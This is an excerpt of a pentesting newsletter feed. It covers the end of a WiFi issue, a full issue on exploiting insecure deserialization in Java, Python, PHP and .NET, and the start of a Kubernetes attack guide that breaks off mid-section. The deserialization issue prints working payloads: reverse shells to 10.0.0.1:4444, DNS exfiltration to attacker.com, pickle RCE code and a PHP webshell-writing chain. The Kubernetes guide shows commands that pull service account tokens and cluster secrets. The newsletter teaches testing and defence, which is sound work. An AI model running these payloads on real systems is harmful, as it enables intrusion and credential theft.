Monitor mode and packet injection are non-negotiable. Test injection before attempting attacks. If it doesn&apos;t work, troubleshoot your drivers and hardware immediately.

Wireshark is essential. Captured packets tell the whole story through EAPOL frames, probe requests, and beacon frames. Learn the filters.

---

That&apos;s it for Part 1!

WiFi security testing is more accessible than ever. The hardware is affordable. The software is free and well-maintained. The techniques are proven and reproducible. What separates successful WiFi pentesters from unsuccessful ones is understanding the fundamentals and knowing how to use the tools effectively.

Practice on your own networks first. Set up a test access point. Capture your own handshakes. Perform deauth attacks against your own devices. Understand what works and what doesn&apos;t before attempting client assessments.

Part 2 will cover the advanced attacks: cracking WPA/WPA2, PMKID extraction, WPS vulnerabilities, WPA3 Dragonblood, enterprise network exploitation, Evil Twin attacks, and captive portal bypasses.

Thanks for reading, and happy hunting!

-- Ruben</content:encoded><category>Newsletter</category><category>wireless-security</category><author>Ruben Santos</author></item><item><title>Deserialization Attacks: When Objects Become Weapons</title><link>https://www.kayssel.com/newsletter/issue-34</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-34</guid><description>From Java gadget chains to Python pickle exploits: a practical guide to exploiting insecure deserialization for remote code execution</description><pubDate>Sun, 25 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

Let me be blunt. Deserialization vulnerabilities are criminally underestimated. You find one of these in an app? You&apos;re often one payload away from RCE. Not &quot;maybe if you chain three other bugs.&quot; Not &quot;escalate privileges first.&quot; Just one malicious serialized object and boom, you&apos;ve got a shell.

That&apos;s what makes these so dangerous. Applications take serialized data, reconstruct it into objects, and during that reconstruction process you can execute arbitrary code. The application trusts that serialized blob. You weaponize that trust.

Here&apos;s the kicker: this affects basically every major language. Java has gadget chains that go straight to RCE. Python&apos;s pickle module? The docs literally say &quot;don&apos;t trust this.&quot; PHP&apos;s `unserialize()` has been getting people popped for over a decade. .NET formatters are exploitable. Even bleeding-edge React Server Components had a serialization bug with a CVSS 10.0 rating.

This week we&apos;re covering everything you need to weaponize deserialization bugs. What they are and why apps use them. How to spot them in the wild. Exploitation techniques across Java, Python, PHP, .NET, and React. Defense strategies. And hands-on labs so you can practice.

**Quick note:** This issue focuses on classic deserialization. For JavaScript prototype pollution (which shares similar attack patterns through object manipulation), check out [Issue #24](/newsletter/issue-24).

If you test web apps, you need to understand this attack class. Let&apos;s weaponize some objects 👇

## 🎯 Understanding Serialization

Serialization converts live objects into transmittable data. Binary formats (Java, .NET, Python pickle) or text formats (JSON, XML). Apps need this for:

- **Session management**: Storing user sessions in cookies or databases
- **Caching**: Serializing objects to Redis or Memcached
- **Microservices**: Passing serialized data between services
- **Message queues**: RabbitMQ and Kafka transmit serialized messages

**Why it&apos;s dangerous:**

When apps deserialize untrusted data, the language runtime reconstructs objects and triggers code execution. You control the serialized blob, you control what executes.

**Magic methods execute automatically.** Python&apos;s `__reduce__()` fires during pickle deserialization. PHP calls `__wakeup()` and `__destruct()`. Java runs `readObject()`. These automatic method calls become your exploitation primitive.

**Gadget chains weaponize existing code.** Apps load libraries with classes that have exploitable side effects. Chain these &quot;gadgets&quot; together and you get RCE. Tools like [ysoserial](https://github.com/frohoff/ysoserial) automate the entire process.

**Apps trust serialized data implicitly.** Unlike form input that gets validated, serialized objects often bypass security checks. The app treats them as trustworthy. That misplaced trust is your attack surface.

## 🔍 Detection

**Identify serialized data signatures:**

Each language has telltale patterns. Look for base64-encoded blobs in cookies, URL parameters, or POST bodies.

**Java** serialized objects start with `rO0` (base64) or `AC ED 00 05` (hex):
```
rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0...
```

**PHP** serialized data is text-based and human-readable:
```
a:2:{s:8:&quot;username&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}
O:4:&quot;User&quot;:1:{s:4:&quot;name&quot;;s:5:&quot;alice&quot;;}
```

**Python pickle** (base64-encoded):
```
gASVKAAAAAAAAACMCF9fbWFpbl9flIwEVXNlcpSTlCmBlH0...
```

**.NET BinaryFormatter** starts with `AAEAAAD`:
```
AAEAAAD/////AQAAAAAAAAAMAgAAAF...
```

**HTTP headers and file extensions** also reveal serialization:
```
Content-Type: application/x-java-serialized-object
Content-Type: application/x-python-pickle
```

File extensions: `.ser` (Java), `.pickle` or `.pkl` (Python), `.bin` (generic binary).

**Testing for vulnerabilities:**

Once you spot serialized data, decode the base64, modify values (username, role, permissions), re-encode, and send it back. If the app accepts your modified object, escalate to malicious payloads.
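Re-encoding by hand is error-prone because PHP embeds string lengths. A small helper keeps the prefixes consistent (sketch: handles flat string values only, not nested objects or quotes inside values):

```python
import re

def set_php_string(serialized: str, key: str, new_value: str) -> str:
    """Swap the string value stored under a given key in a PHP-serialized
    blob, fixing the s:len prefix to match the new value."""
    pattern = re.compile(r's:%d:"%s";s:\d+:"[^"]*"' % (len(key), re.escape(key)))
    repl = 's:%d:"%s";s:%d:"%s"' % (len(key), key, len(new_value), new_value)
    # lambda avoids re.sub interpreting backslashes in the replacement
    return pattern.sub(lambda m: repl, serialized, count=1)

cookie = 'a:2:{s:8:"username";s:5:"alice";s:4:"role";s:4:"user";}'
print(set_php_string(cookie, "role", "admin"))
# a:2:{s:8:"username";s:5:"alice";s:4:"role";s:5:"admin";}
```

A mismatched length prefix makes `unserialize()` fail silently, so always recompute it.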

**Test with known-bad payloads:**

```bash
# Java - trigger 10 second delay
java -jar ysoserial.jar CommonsCollections5 &apos;sleep 10&apos; | base64

# Python - trigger 10 second delay
python3 - &lt;&lt;&apos;EOF&apos;
import pickle, os, base64
class Exploit:
    def __reduce__(self):
        return (os.system, (&apos;sleep 10&apos;,))
print(base64.b64encode(pickle.dumps(Exploit())).decode())
EOF
```

Watch for execution evidence: time delays, DNS lookups to your domain, HTTP callbacks, or error messages leaking class names. Any of these confirm code execution.

## ☕ Java Deserialization

Java deserialization is the OG of this vulnerability class. The Java ecosystem is massive. Libraries everywhere. Apache Commons Collections, Spring Framework. All packed with gadget chains leading to RCE.

**How it works:**

Java serialization turns objects into byte streams. Classes implement `Serializable` and the JVM handles everything automatically. Convenient for developers. Perfect for attackers.

The vulnerability triggers when `readObject()` processes untrusted data you control.

**Gadget chains:**

Apps load libraries with classes that have exploitable side effects. Each class is a &quot;gadget.&quot; Chain enough together, you get code execution.

Apache Commons Collections (versions 3.1-3.2.1 and 4.0) is the classic example. Loaded with exploitable gadgets. And this library is everywhere in enterprise Java apps.

**[ysoserial](https://github.com/frohoff/ysoserial) automates everything:**

```bash
# Generate Commons Collections payload
java -jar ysoserial.jar CommonsCollections6 &apos;touch /tmp/pwned&apos; &gt; payload.ser

# Base64 encode for web delivery
cat payload.ser | base64

# DNS exfiltration to confirm execution
java -jar ysoserial.jar CommonsCollections5 &apos;nslookup $(whoami).attacker.com&apos; | base64

# Reverse shell
java -jar ysoserial.jar CommonsCollections5 &apos;bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.0.0.1/4444 0&gt;&amp;1&quot;&apos; | base64
```

**Your exploitation workflow:**

Find serialized Java object (cookie, parameter, POST body). Generate ysoserial payload with DNS callback. Confirm execution. Escalate to full RCE. Pop a reverse shell or exfiltrate data.

Oracle WebLogic Server has been a goldmine for Java deserialization bugs. T3 protocol vulnerabilities. The `_async` component. Both allowed unauthenticated RCE.

## 🐍 Python Pickle Exploitation

Python pickle is inherently unsafe. Not &quot;potentially risky if misconfigured.&quot; Inherently unsafe. The [official Python docs](https://docs.python.org/3/library/pickle.html) literally warn you:

&gt; &quot;Warning: The pickle module is not secure. Only unpickle data you trust.&quot;

**Why pickle is dangerous:**

Pickle serializes arbitrary Python objects. Functions, classes, whatever. During deserialization, it executes code through the `__reduce__()` magic method.

**How easy is exploitation? Watch:**

```python
import pickle
import os
import base64

class Exploit:
    def __reduce__(self):
        # __reduce__ returns (callable, arguments)
        # This executes os.system(&apos;whoami&apos;) during unpickling
        return (os.system, (&apos;whoami&apos;,))

# Serialize malicious object
payload = pickle.dumps(Exploit())
print(base64.b64encode(payload).decode())
```

App calls `pickle.loads()` on that payload? `os.system(&apos;whoami&apos;)` executes. That simple.

**Vulnerable code pattern:**

```python
import pickle
from flask import Flask, request

app = Flask(__name__)

@app.route(&apos;/load_session&apos;, methods=[&apos;POST&apos;])
def load_session():
    # VULNERABLE: Deserializing user input
    session_data = request.data
    session = pickle.loads(session_data)
    return f&quot;Loaded session for {session[&apos;username&apos;]}&quot;
```

**Exploitation:**

```python
import pickle
import base64
import os

class RCE:
    def __reduce__(self):
        cmd = &apos;bash -c &quot;bash -i &gt;&amp; /dev/tcp/10.0.0.1/4444 0&gt;&amp;1&quot;&apos;
        return (os.system, (cmd,))

payload = pickle.dumps(RCE())
print(base64.b64encode(payload).decode())
# Send to /load_session endpoint
```

Pickle bugs show up everywhere. Waitress HTTP Server had one. Python Cryptography Library had one. All led to RCE.

## 🐘 PHP unserialize() Exploitation

PHP&apos;s `unserialize()` has been a gift that keeps on giving for over a decade. Legacy PHP apps love deserializing user input without validation.

**PHP serialization format:**

PHP serialization is text-based and human-readable. Makes it trivial to spot and manipulate:

```php
// Array serialization
a:2:{s:8:&quot;username&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}

// Object serialization
O:4:&quot;User&quot;:2:{s:4:&quot;name&quot;;s:5:&quot;alice&quot;;s:4:&quot;role&quot;;s:5:&quot;admin&quot;;}
```

Format breakdown:
- `a:2:{}` - Array with 2 elements
- `s:8:&quot;username&quot;` - String of length 8
- `O:4:&quot;User&quot;` - Object of class &quot;User&quot; (the 4 is the class-name length)

**Magic methods and POP chains:**

PHP magic methods fire automatically during object lifecycle:

```php
__wakeup()    // Called during unserialize()
__destruct()  // Called when object is destroyed
__toString()  // Called when object is treated as string
```

**POP Chains** (Property-Oriented Programming) chain object properties and magic methods to achieve code execution. Gadget chains for PHP.

**Example vulnerable code:**

```php
class Logger {
    private $logfile;

    public function __destruct() {
        // VULNERABLE: Executes during object destruction
        file_put_contents($this-&gt;logfile, &quot;Log closed\n&quot;, FILE_APPEND);
    }
}

// Somewhere in the application
$data = unserialize($_COOKIE[&apos;session&apos;]);
```

**Exploitation:**

```php
&lt;?php
class Logger {
    private $logfile = &apos;/var/www/html/shell.php&apos;;
}

$exploit = new Logger();
echo serialize($exploit);
// O:6:&quot;Logger&quot;:1:{s:15:&quot;\0Logger\0logfile&quot;;s:23:&quot;/var/www/html/shell.php&quot;;}
// (private properties are name-mangled with NUL bytes: \0Class\0prop)
```

App unserializes this? `__destruct()` writes to `/var/www/html/shell.php`. Webshell deployed.
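The length prefixes in that payload are worth understanding: PHP name-mangles private properties as NUL + class + NUL + property, and those NUL bytes count toward `s:len`. A small generator (a sketch covering private string properties only) makes the counting mechanical:

```python
def php_serialize_object(cls, private_props):
    """Serialize a PHP object with private string properties. PHP mangles
    a private property name to NUL + class + NUL + name, and the NUL
    bytes count toward the s:len prefix."""
    parts = []
    for name, value in private_props.items():
        mangled = "\x00%s\x00%s" % (cls, name)
        parts.append('s:%d:"%s";s:%d:"%s";' % (len(mangled), mangled,
                                               len(value), value))
    return 'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(private_props),
                                  "".join(parts))

payload = php_serialize_object("Logger", {"logfile": "/var/www/html/shell.php"})
# O:6:"Logger":1:{s:15:"\x00Logger\x00logfile";s:23:"/var/www/html/shell.php";}
```

Get the mangling wrong and `unserialize()` drops the property instead of erroring, which makes failed exploits hard to debug.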

**[PHPGGC](https://github.com/ambionics/phpggc)** automates POP chain exploitation:

```bash
# List available gadget chains
./phpggc -l

# Generate Laravel RCE payload
./phpggc Laravel/RCE1 system &apos;id&apos;

# Generate Symfony RCE payload
./phpggc Symfony/RCE4 system &apos;whoami&apos;
```

PHP unserialize bugs keep appearing. cPanel had object injection in session handling. Apache CouchDB had unserialize issues. PHPMailer got hit with object injection via the `phar://` wrapper.

## ⚛️ Modern Frameworks - React Server Components

Serialization bugs aren&apos;t just legacy tech. React Server Components got hit with [CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182), a CVSS 10.0 prototype pollution bug in the Flight Protocol.

**Attack vector:**

```javascript
{
  &quot;__proto__&quot;: {
    &quot;isAdmin&quot;: true,
    &quot;shell&quot;: &quot;require(&apos;child_process&apos;).exec(&apos;whoami&apos;)&quot;
  }
}
```

User input flows into Flight serialization. Malicious object pollutes Object.prototype. Downstream code executes contaminated property. RCE in Node.js context. [Actively exploited in the wild](https://www.trendmicro.com/en_us/research/25/l/CVE-2025-55182-analysis-poc-itw.html).

**Fix:** Update to React &gt;= 19.1.0 or Next.js &gt;= 15.3.2. Check [Issue #24](/newsletter/issue-24) for prototype pollution fundamentals.

Serialization bugs exist everywhere. Legacy Java apps. Cutting-edge JavaScript frameworks. Everywhere.

## 🔷 .NET Deserialization

Microsoft officially says [BinaryFormatter is dangerous and you shouldn&apos;t use it](https://learn.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide). They gave up trying to secure it.

**[ysoserial.net](https://github.com/pwntester/ysoserial.net)** generates .NET payloads:

```powershell
# BinaryFormatter
ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c &quot;whoami&quot;

# JSON.NET TypeNameHandling
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c &quot;calc&quot;
```

**JSON.NET with TypeNameHandling.All** includes type info that enables RCE:

```json
{
  &quot;$type&quot;: &quot;System.Windows.Data.ObjectDataProvider, PresentationFramework&quot;,
  &quot;MethodName&quot;: &quot;Start&quot;,
  &quot;ObjectInstance&quot;: { &quot;$type&quot;: &quot;System.Diagnostics.Process, System&quot; }
}
```

Microsoft SharePoint gets owned via .NET deserialization in the ViewState parameter. Unauthenticated RCE. Core .NET Framework components (DataSet, DataTable) have had multiple bugs.

## 🛠️ Tools for Deserialization Testing

**[ysoserial](https://github.com/frohoff/ysoserial)** - Your go-to for Java deserialization. Generates payloads for dozens of Java libraries.

```bash
# Download and use
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
java -jar ysoserial-all.jar [payload] [command]
```

**[ysoserial.net](https://github.com/pwntester/ysoserial.net)** - The .NET equivalent. Supports BinaryFormatter, NetDataContractSerializer, JSON.NET, and more.

```powershell
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c &quot;calc&quot; -o base64
```

**[PHPGGC](https://github.com/ambionics/phpggc)** - Automates POP chain exploitation for PHP frameworks. Laravel, Symfony, WordPress, you name it.

```bash
./phpggc Laravel/RCE1 system &apos;id&apos; | base64
```

**[marshalsec](https://github.com/mbechler/marshalsec)** - Research toolkit for Java unmarshalling bugs. JNDI injection, RMI exploitation, gadget chain research.

**Burp Suite Extensions:**
- **Java Deserialization Scanner**: Automates detection of Java deserialization bugs
- **Freddy**: Active and passive scanner for deserialization across multiple languages

## 🧪 Labs

**[PortSwigger Web Security Academy - Insecure Deserialization](https://portswigger.net/web-security/deserialization)**: Comprehensive labs covering PHP object manipulation, Java gadget chains, PHPGGC exploitation, and custom chain development.

**HackTheBox Machines:**
- **[Arkham](https://www.hackthebox.com/machines/arkham)** (Medium): Java deserialization via ViewState
- **[Tenet](https://www.hackthebox.com/machines/tenet)** (Medium): PHP unserialize() exploitation
- **[JSON](https://www.hackthebox.com/machines/json)** (Medium): .NET JSON.NET TypeNameHandling
- **[Fatty](https://www.hackthebox.com/machines/fatty)** (Insane): Custom Java gadget chains

## 🔒 Defense and Mitigation

**Golden rule: Never deserialize untrusted data.**

You control the serialization source and transmission channel? Safe. Users can influence the serialized data? Vulnerable.

**Use safe serialization formats:**

Replace binary serialization with safer alternatives:

```python
# UNSAFE
import pickle
data = pickle.loads(user_input)

# SAFE
import json
data = json.loads(user_input)
```

JSON, XML, and Protocol Buffers can&apos;t execute arbitrary code during deserialization. Use them.

**Language-specific mitigations:**

**Java**: Use `ObjectInputFilter` (JDK 9+) to whitelist allowed classes:
```java
ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(&quot;com.example.SafeClass;!*&quot;);
ois.setObjectInputFilter(filter);
```

**Python**: Use `json` instead of `pickle`. If pickle is required, implement class validation with `RestrictedUnpickler`.

**.NET**: Avoid BinaryFormatter entirely. Use `System.Text.Json` or MessagePack.

**PHP**: Use `allowed_classes` option:
```php
// Only allow specific classes
$data = unserialize($input, [&apos;allowed_classes&apos; =&gt; [&apos;User&apos;, &apos;Session&apos;]]);

// Disallow all classes (primitives only)
$data = unserialize($input, [&apos;allowed_classes&apos; =&gt; false]);
```

**Monitor and detect:**

Log all deserialization operations. Alert on known malicious class names (`CommonsCollections`, `ObjectDataProvider`). Implement rate limiting on deserialization endpoints.

## 🎯 Key Takeaways

Deserialization bugs give you direct RCE. No chaining. No privilege escalation. Find it, exploit it, you&apos;ve got code execution.

Every major language is vulnerable. Java (ysoserial gadget chains), Python (pickle is inherently unsafe), PHP (POP chains), .NET (BinaryFormatter deprecated), React (CVSS 10.0 prototype pollution). All exploitable.

Detection is straightforward. Base64 blobs in cookies or POST bodies. Specific signatures: `rO0` (Java), `gASV` (Python pickle), `O:4:&quot;User&quot;` (PHP), `AAEAAAD` (.NET). Once you know the patterns, exploitation is trivial.

Tools automate everything. [ysoserial](https://github.com/frohoff/ysoserial), [ysoserial.net](https://github.com/pwntester/ysoserial.net), [PHPGGC](https://github.com/ambionics/phpggc). Most attacks don&apos;t need custom gadget chains.

---

That&apos;s it for this week.

The challenge is recognition. Serialized data is buried in cookies, POST bodies, binary protocols. Learn those signatures. Master the tools. Practice on [PortSwigger labs](https://portswigger.net/web-security/deserialization) and HackTheBox machines.

Golden rule: never deserialize untrusted data.

Thanks for reading, and happy hunting!

— Ruben</content:encoded><category>Newsletter</category><category>web-security</category><author>Ruben Santos</author></item><item><title>Kubernetes for Pentesters: Breaking Orchestrated Infrastructure from Zero</title><link>https://www.kayssel.com/newsletter/issue-33</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-33</guid><description>From your first pod compromise to full cluster takeover: a practical introduction to Kubernetes security testing</description><pubDate>Sun, 18 Jan 2026 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ve been wanting to write about Kubernetes security for a while now. A few months ago I covered [Docker container escapes](https://www.kayssel.com/newsletter/issue-23/), and Kubernetes is the natural next step when you start thinking about production container environments.

I started a [Docker Security series](https://www.kayssel.com/series/docker-security/) on the blog, but honestly, I don&apos;t know when I&apos;ll get around to finishing it. Life gets in the way, other projects take priority, and before you know it, months have passed. So instead of waiting indefinitely to write a comprehensive blog series, I&apos;m giving you the essentials in this newsletter.

If you&apos;ve broken out of Docker containers and wondered what happens in production environments where Kubernetes manages hundreds of pods across multiple nodes, this is your crash course.

Docker escapes are about breaking out of a single container to reach the host. Kubernetes attacks are about compromising one pod to gain access to the entire cluster infrastructure. Other pods, secrets, API server credentials, persistent volumes, and ultimately the underlying nodes. The attack surface is massive, and the barrier to entry is lower than you&apos;d think.

This newsletter covers Kubernetes fundamentals for pentesters, detecting when you&apos;re in a pod, service account tokens (automatic credentials in every pod), RBAC misconfigurations and privilege escalation paths, and essential tools and labs to practice these attacks.

Let&apos;s break some clusters 👇

## ☸️ Kubernetes 101 for Pentesters

Before we exploit anything, let&apos;s understand what Kubernetes is and why it exists.

Kubernetes (K8s) is a container orchestration platform. It manages containers across multiple machines, handles networking between them, distributes workloads, and restarts failed containers automatically. Docker runs one container on one machine. Kubernetes runs thousands of containers across hundreds of machines with automatic scaling, load balancing, and self-healing.

For pentesters, this means credentials are everywhere (every pod gets automatic API access via service account tokens), networking is shared (pods can communicate across the cluster by default), secrets are centralized (Kubernetes stores sensitive data in a single location), and privilege escalation is common (RBAC misconfigurations grant excessive permissions).

Breaking one pod can give you access to the entire cluster.

### Kubernetes Architecture (Attack Surface Map)

Kubernetes clusters have two types of machines.

**Control Plane nodes** manage the cluster. The **API Server** is the central control point for everything. Every kubectl command, every pod creation, every secret access goes through the API server. This is your primary target. **etcd** is the distributed key-value database storing all cluster data including secrets, configurations, and state. Compromising etcd means full cluster compromise. The Scheduler decides which node runs which pod, and the Controller Manager ensures desired state matches actual state.

**Worker Nodes** run your actual workloads (pods). The **kubelet** is an agent on each node that manages containers and exposes an API, often unauthenticated. Direct kubelet access means node compromise. kube-proxy handles networking and load balancing. The Container Runtime (Docker, containerd, or CRI-O) runs the actual containers.

From an attacker perspective, the path looks like this:

```
Pod Compromise → Service Account Token → API Server Access → RBAC Enumeration →
Privilege Escalation → Create Privileged Pod → Node Access → etcd Access →
Full Cluster Compromise
```

The path from &quot;I have RCE in a web app running in a pod&quot; to &quot;I control the entire Kubernetes cluster&quot; is shorter than you&apos;d think.

### Key Kubernetes Concepts

**Pod** is the smallest deployable unit. It can contain one or more containers. Think of it as a wrapper around your Docker container(s).

**Namespace** provides logical isolation within a cluster. Resources in `namespace-a` are separated from `namespace-b`, but this is NOT a security boundary. RBAC controls access, not namespaces.

**Service** exposes pods to network traffic (ClusterIP, NodePort, LoadBalancer) and handles internal DNS and load balancing.

**Secret** is a Kubernetes object for storing sensitive data like passwords, tokens, and keys. Secrets are stored in etcd and are base64 encoded (not encrypted) by default unless you enable encryption at rest.

**ConfigMap** is similar to Secrets but for non-sensitive configuration. It often contains database hostnames, API endpoints, etc.

**RBAC (Role-Based Access Control)** defines who can do what in the cluster. This is where most privilege escalation happens.

**Service Account** provides identity for pods. Every pod automatically gets a service account token mounted at `/var/run/secrets/kubernetes.io/serviceaccount/`. This is your credential for talking to the API server.

In Kubernetes, the primary attack vector shifts from kernel exploitation to API abuse and RBAC privilege escalation. Privileged containers still work, but you need RBAC permissions to create them. Host PID namespace access requires `hostPID: true` in the pod spec. Kernel exploits like Dirty Pipe still work, but you need node access first.

## 🎯 Why Kubernetes Security Matters

When you compromise a container in a traditional environment, you&apos;re limited to that container and potentially the host it&apos;s running on. When you compromise a pod in Kubernetes, the situation is different.

Every pod gets a service account token by default. This token can often list other pods in the namespace, read secrets, access ConfigMaps, and create new pods if RBAC is misconfigured. Kubernetes networking is flat by default. Unless Network Policies are configured (and they usually aren&apos;t), you can reach any other pod in any namespace, access internal services like databases and message queues, and pivot to other applications running in the cluster.

Kubernetes stores secrets centrally in etcd. If your service account has `secrets:get` permission, you can access database passwords, API keys for third-party services, cloud provider credentials (AWS, GCP, Azure), and SSH keys, certificates, and tokens.

Kubernetes nodes run on cloud instances (AWS EC2, GCP Compute Engine, Azure VMs). If you can reach the node or exploit the kubelet API, you can perform SSRF to the cloud metadata service at `169.254.169.254`, steal cloud IAM credentials, and pivot to the entire cloud account.

Unlike ephemeral containers, Kubernetes makes persistence easy. You can create a new pod with a backdoor, modify existing deployments, add malicious init containers, or deploy DaemonSets that run on every node.

The common pattern in real-world incidents is Kubernetes misconfigurations (unauthenticated APIs, overly permissive RBAC, exposed secrets) leading to full infrastructure compromise. The [Tesla cryptomining incident](https://cyberscoop.com/tesla-cryptomining-redlock-cloud-breach/), for example, started with an unauthenticated Kubernetes dashboard and ended with cloud credential theft and cryptominers deployed across the entire cluster.

## 🔍 Detecting You&apos;re in a Kubernetes Pod

First step is figuring out if you&apos;re in a Kubernetes-managed container versus a standalone Docker container.

Every Kubernetes pod automatically mounts service account credentials at `/var/run/secrets/kubernetes.io/serviceaccount/`. If this directory exists, you&apos;re in a Kubernetes pod.

```bash
ls -la /var/run/secrets/kubernetes.io/serviceaccount/
```

The directory contains three files. `token` is the JWT token for authenticating to the API server. `ca.crt` is the certificate authority for verifying API server TLS. `namespace` contains the namespace this pod is running in.
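The token is a JWT, so you can read its claims (issuer, service account name, expiry) without any key; only signature verification needs the cluster. A minimal decoder sketch:

```python
import base64
import json

def jwt_claims(token: str) -> dict:
    """Read the claims from a JWT without verifying the signature.
    The payload is just base64url-encoded JSON between the two dots."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))
```

On a real service account token the `sub` claim looks like `system:serviceaccount:NAMESPACE:NAME`, which tells you exactly which identity you hold.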

Kubernetes automatically injects environment variables for service discovery. The presence of `KUBERNETES_SERVICE_HOST` confirms you&apos;re in a pod.

```bash
env | grep KUBERNETES
```

You&apos;ll see variables like `KUBERNETES_SERVICE_HOST=10.96.0.1` and `KUBERNETES_SERVICE_PORT=443`.

You can also check the cgroup path for `kubepods`:

```bash
cat /proc/1/cgroup | grep kubepods
```

Kubernetes pod hostnames follow a predictable pattern like `webapp-deployment-7d8f9c4b5-xk9pl` with the format `{deployment-name}-{replicaset-hash}-{pod-hash}`.
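That naming convention is easy to check programmatically when triaging many shells at once. A rough matcher (assumption: the hash lengths here are typical observed values, not an exact spec of Kubernetes naming):

```python
import re

# name-{replicaset-hash}-{pod-hash}: the last two segments are short
# lowercase alphanumeric hashes; the rest is the deployment name.
POD_NAME = re.compile(r"^(.+)-([a-z0-9]{8,10})-([a-z0-9]{5})$")

m = POD_NAME.match("webapp-deployment-7d8f9c4b5-xk9pl")
if m:
    deployment, rs_hash, pod_hash = m.groups()
    # deployment == "webapp-deployment"
```

A match tells you the pod is deployment-managed, so killing it just respawns a replica under a new name.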

Once you&apos;ve confirmed you&apos;re in a Kubernetes pod, gather initial information. Check your namespace, pod hostname, environment variables (they may leak internal service names), whether kubectl is installed, and test network connectivity to the API server.

```bash
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
hostname
env
which kubectl
curl -k https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT/version
```

## 🔑 Service Account Tokens Are Your First Credential

Every Kubernetes pod gets a service account token automatically mounted at `/var/run/secrets/kubernetes.io/serviceaccount/token`. This JWT token is your credential for talking to the API server.

By default, pods use the `default` service account in their namespace. This account should have minimal permissions, but developers often grant it excessive access for convenience.

### Querying the API Server

Set up your environment variables first:

```bash
APISERVER=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
```

Test API access by listing pods:

```bash
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/pods
```

### Enumerating Permissions

The first thing you want to know is what this service account can do. If kubectl is installed in the pod, you can use it directly:

```bash
kubectl auth can-i --list
kubectl auth can-i create pods
kubectl auth can-i get secrets --all-namespaces
```

Without kubectl, you need to try different API endpoints with curl. Try listing secrets in your namespace, checking for cluster-wide pod access, or attempting to create resources.

```bash
# List secrets
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/secrets

# Check cluster-wide access
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/pods
```
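Without kubectl you can still ask the cluster what you are allowed to do: `kubectl auth can-i` is just a POST to the SelfSubjectAccessReview API. A sketch that builds the request body:

```python
import json

def can_i_body(verb: str, resource: str, namespace: str) -> str:
    """JSON body for POST .../apis/authorization.k8s.io/v1/selfsubjectaccessreviews,
    the same check kubectl auth can-i performs. The response reports
    status.allowed true/false for the current token."""
    return json.dumps({
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectAccessReview",
        "spec": {"resourceAttributes": {
            "namespace": namespace, "verb": verb, "resource": resource,
        }},
    })

print(can_i_body("create", "pods", "default"))
```

POST it to `$APISERVER/apis/authorization.k8s.io/v1/selfsubjectaccessreviews` with the bearer token and `Content-Type: application/json`, then read `status.allowed` from the response.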

High-value permissions to look for include `secrets:get/list` for reading passwords, API keys, and cloud credentials. `pods:create` allows you to create new pods, which is a direct privilege escalation path. `pods:exec` lets you execute commands in other pods. `*:*` means full cluster admin access.

### Stealing Secrets

If you have `secrets:get` or `secrets:list`, you can pull secrets straight from the API. They are base64-encoded, not encrypted, so decoding them locally is trivial.

```bash
curl --cacert $CACERT --header &quot;Authorization: Bearer $TOKEN&quot; \
  $APISERVER/api/v1/namespaces/$NAMESPACE/secrets/database-credentials | jq &apos;.data&apos;
```

Decode with `echo &quot;YWRtaW4=&quot; | base64 -d` to reveal the plaintext value.
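Decoding one key at a time gets old; the `.data` map from the API decodes in one pass. A small sketch (the example values below are hypothetical):

```python
import base64

def decode_secret_data(data: dict) -> dict:
    """Decode the base64 values in the .data map of a Kubernetes Secret."""
    return {k: base64.b64decode(v).decode(errors="replace")
            for k, v in data.items()}

# Hypothetical .data map as returned by the secrets API
print(decode_secret_data({"username": "YWRtaW4=", "password": "czNjcjN0"}))
# {'username': 'admin', 'password': 's3cr3t'}
```

Pipe the API response through `jq '.data'` and feed the result to this helper to dump every credential in a namespace at once.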

According to the [NSA/CISA Kubernetes Hardening Guide](https://media.defense.gov/2022/Aug/29/2003066362/-1/-1/0/CTR_KUBERNETES_HARDENING_GUIDANCE_1.2_20220829.PDF), service accounts are a common source of over-privileged access. In practice, the `default` service account often has cluster-wide read access, and legacy applications may have full admin tokens.

## 🔐 RBAC and Privilege Escalation

RBAC (Role-Based Access Control) defines who can do what in Kubernetes. Misconfigurations here are the primary path to privilege escalation.

**Role** defines permissions scoped to a specific namespace. **ClusterRole** defines permissions scoped to the entire cluster. **RoleBinding** assigns a Role to users or service accounts within a namespace. **ClusterRoleBinding** assigns a ClusterRole across all namespaces.

### Common Misconfigurations

The most dangerous misconfiguration is granting `cluster-admin` to the `default` service account. This gives full cluster access from any pod in that namespace.

Wildcard permissions are equally problematic. Rules with `apiGroups: [&quot;*&quot;]`, `resources: [&quot;*&quot;]`, and `verbs: [&quot;*&quot;]` grant unrestricted admin access.

